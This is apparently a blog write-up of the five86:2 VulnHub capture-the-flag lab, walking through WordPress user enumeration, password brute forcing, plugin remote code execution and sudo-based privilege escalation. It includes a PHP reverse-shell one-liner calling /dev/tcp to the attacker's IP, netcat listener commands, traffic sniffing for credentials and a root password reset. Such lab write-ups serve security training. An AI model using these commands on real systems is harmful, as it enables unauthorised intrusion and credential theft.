five86 2 walkthrough vulnhub ctf

five86:-2 Walkthrough Vulnhub Writeup

Five86:-2 Download Link

Today we are solving five86: 2 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 2 walkthrough

Every Time our first Step is Finding our target IP address using any toll Today we are using netdiscover

netdiscover
five86 2 walkthrough

Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http WordPress service is running

nmap -A 192.168.0.104
five86 2 walkthrough

Enumeration

enumerating port 80 http service we already see Nmap scan target machine running WordPress

http://192.168.0.104

we go to wp-login page and we can see the error WordPress URL fixing the error I am adding a hostname our hostname file five86-2 this hostname we are already seeing in URL error

vi /etc/hosts

192.168.0.104 five86-2

five86 2 walkthrough

After adding the target machine hostname our hostname file I run the most popular tool wpscan for WordPress and ( -e u parameter use all WordPress user enumerate )

wpscan --url http://five86-2 -e u
five86 2 walkthrough

After completing our scan we see wpscan output 5 User entry see the image file

  1. admin
  2. gillian
  3. peter
  4. barney
  5. stephen

I already create a user.txt file and add every user we found in wpscan

our next step is password Bruteforce attack against 5 users ( -U parameter our user list file directory) and ( -P parameter use password wordlists file )

wpscan --url http://five86-2 -U user.txt -P /usr/share/wordlists/rockyou.txt
five86 2 walkthrough

After completing the password Brute-Force attack we found two usernames and passwords.

  • Username: barney
  • Password: spooky1
  • username: stephen
  • password: apollo1

After login the WordPress I go to Plugins Section and we see three plugins After searching all plugin version exploit-db I found a Vulnerable Plugin Insert or Embed Articulate Content into WordPress – Remote Code Execution.

I creating a Simple php oneliner reverse shell and save a file shell.php and I create one another file index.html and compressed a zip file name hacker.zip

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.103/1234 0>&1'");
five86 2 walkthrough

I click the post button and we see WordPress hello word! default post I am got to edit section and click the plus button and insert an E-Learning Blog

and Uploading our hacker.zip file and we see the directory e-Learning Block Now before opening our shell.zip file starting our natcat listener

Now before opening our shell.zip file starting our Netcat listener and open the shell.php directory

http://five86-2/wp-content/uploads/articulate_uploads/hacker/shell.php
five86 2 walkthrough

We got a target system Netcat reverse connection

nc -lvp 1234
cd /home
id

Privileges Escalation

and I go to target home directory and see all username and I found a user Stephen we already found the user password wpscan Now changing the shell www-data to Stephen shell

  • su stephen
  • Password: apollo1

After changing the user we see blank shell now importing python3 to proper shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Id command to see userID and group ID and others ID

id

IP add to see all interface name our target machine

ip add

changing our directory to user Stephen directory and I dump all TCP packet target machine and save a hacknos.pcap file

cd stephen
timeout 120 tcpdump -w hacknos.pcap -i veth2c37c59

After complete TCP dump process, I open the file and I see FTP username and password

tcpdump -r hacknos.pcap |more

Changing our using FTP username paul and password esomepasswford

  • su paul
  • Password: esomepasswford
id

sudo -l command to see all user entry sudoers file And I see user peter is run the tool /usr/sbin/service without asking root password

sudo -l

I search in google and I found a privilege escalation /service and I run the command and our shell is change paul to peter

sudo -u peter /usr/sbin/service ../../bin/bash
sudo -l

again sudo -l to see sudoers user entry and we see user peter is run passwd command without asking root password I change the root password and switching normal user to root user shell.

sudo -u root passwd root
  • New password: toor
  • Retype new password: toor
  • su root
  • Password: toor
cd /root
five86 2 walkthrough
ls

target root directory we see our root flag

cat thisistheflag.txt
five86 2 walkthrough

Five86-1 Vulnhub CTF Walkthrough see here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

One Comment on “five86 2 walkthrough vulnhub ctf”

  1. Hi first of all thanks for your writeup. when I reviewed your article, I repeated what you did, but how did you search for” /usr/sbin/service ” in google when you were looking for weakness? If I had come this far, I wouldn’t have found this weakness.Could you give me clue? Thank you.

Leave a Reply

Your email address will not be published. Required fields are marked *